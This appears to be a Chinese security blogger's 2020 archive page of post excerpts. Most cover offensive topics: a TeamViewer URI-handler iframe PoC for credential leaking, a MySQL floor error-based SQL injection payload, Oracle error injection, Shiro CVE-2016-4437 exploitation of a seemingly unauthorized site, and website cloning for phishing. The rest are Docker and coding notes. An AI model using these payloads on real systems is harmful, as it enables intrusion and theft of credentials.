2020年8月
teamviewer POC(自行修改)
摘要: <html><head>test poc</head><body><div><iframe style="height:1px;width:1px;" src='teamviewer10: --play \\127.0.0.1\share\fake.tvs'"></div></body></html 阅读全文
posted @ 2020-08-11 09:12 wudixiaoherry 阅读(157) 评论(0) 推荐(0) 编辑
kali安装docker
摘要: 最近要在客户现场做一次钓鱼测试,开始用的自己的云服务器搭了一个钓鱼平台,但是发现国内的25端口全被禁了,自己有没有国外的服务器没办法只能用自己的虚拟机了。 下面是安装步骤: 1、安装https协议、CA证书、dirmngr apt-get update 、apt-get install -y apt 阅读全文
posted @ 2020-08-05 12:30 wudixiaoherry 阅读(249) 评论(0) 推荐(0) 编辑
2020年7月
docker笔记整合(常用)
摘要: 一、容器生命周期管理 运行容器:docker run +参数 -d 后台运行容器,-P 随机端口映射,-p 映射端口 格式:主机端口:映射端口,-name “ asdas” 为容器指定一个名字 容器启动:docker start 容器名 容器停止:docker stop 容器名 容器重启:docke 阅读全文
posted @ 2020-07-19 13:32 wudixiaoherry 阅读(117) 评论(0) 推荐(0) 编辑
python 截取网页内容
摘要: from selenium import webdriver # 从selenium库中调用webdriver模块import time # 调用time模块driver = webdriver.Chrome()# 设置引擎为Chrome,真实地打开一个Chrome浏览器#driver.maximi 阅读全文
posted @ 2020-07-16 14:11 wudixiaoherry 阅读(381) 评论(0) 推荐(0) 编辑
整合Spring Boot
摘要: 1.file==》new==》project 2.搭建成功,目录结构如下 3.右键com.example.demo 4.新建包 5.右键web包,新建Java Class文件SimpleController package com.example.demo.web; import com.examp 阅读全文
posted @ 2020-07-13 10:13 wudixiaoherry 阅读(174) 评论(0) 推荐(0) 编辑
给大家简单分享一下hw攻击(大佬勿喷)
摘要: HW攻击思路分享 信息收集->获取权限->横向移动 信息收集: 组织架构、IT资产、代码泄露、历史漏洞、文档信息泄露、邮箱信息泄露、供应商信息 组织架构:子公司 IT资产:域名、IP地址、ip端、开放端口、运行服务、web中间件信息、web应用 互联网信息泄露:代码泄露、历史漏洞、文档信息泄露、邮箱 阅读全文
posted @ 2020-07-09 17:35 wudixiaoherry 阅读(2217) 评论(0) 推荐(0) 编辑
kali(社会工程学工具)克隆网站
摘要: 今天想研究一下钓鱼,决定克隆一手网站,心痒难耐准备动手,原始页面如下: 刚开始使用IDM克隆,结果被公司大佬骂了一顿,想到kali里面有一个set哈哈哈哈哈 开始研究: 打开kali,搜索s,找到工具,回车 选择第一个选项,英语自行翻译。 大概是第二个选项吧 唉,英文水平不行也就能看懂个web了,我 阅读全文
posted @ 2020-07-02 10:42 wudixiaoherry 阅读(1883) 评论(0) 推荐(0) 编辑
2020年6月
shiro反序列化(CVE-2016-4437)
摘要: 脚本自行git查找。 偶然发现之前的一个网站,抓包发现cookie中存在remember=deleteme(这里就不截图了,防止留下证据) 手痒难耐,就试试4437这个洞,首先打开你的shiro脚本,使用一条命令 得到回显 咦,是不是可以直接动手,菜鸟不考虑利用链,直接就使用poc来打就是了 大佬勿 阅读全文
posted @ 2020-06-30 17:52 wudixiaoherry 阅读(504) 评论(0) 推荐(0) 编辑
oralce报错注入(转自某个奇安信大佬)
摘要: 0x00 前言 在oracle注入时候出现了数据库报错信息,可以优先选择报错注入,使用报错的方式将查询数据的结果带出到错误页面中。 使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式。 判 阅读全文
posted @ 2020-06-24 11:24 wudixiaoherry 阅读(230) 评论(0) 推荐(0) 编辑
报错注入函数
摘要: 1、通过floor报错,注入语句如下: and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2、通过ExtractVa 阅读全文
posted @ 2020-06-24 11:22 wudixiaoherry 阅读(544) 评论(0) 推荐(0) 编辑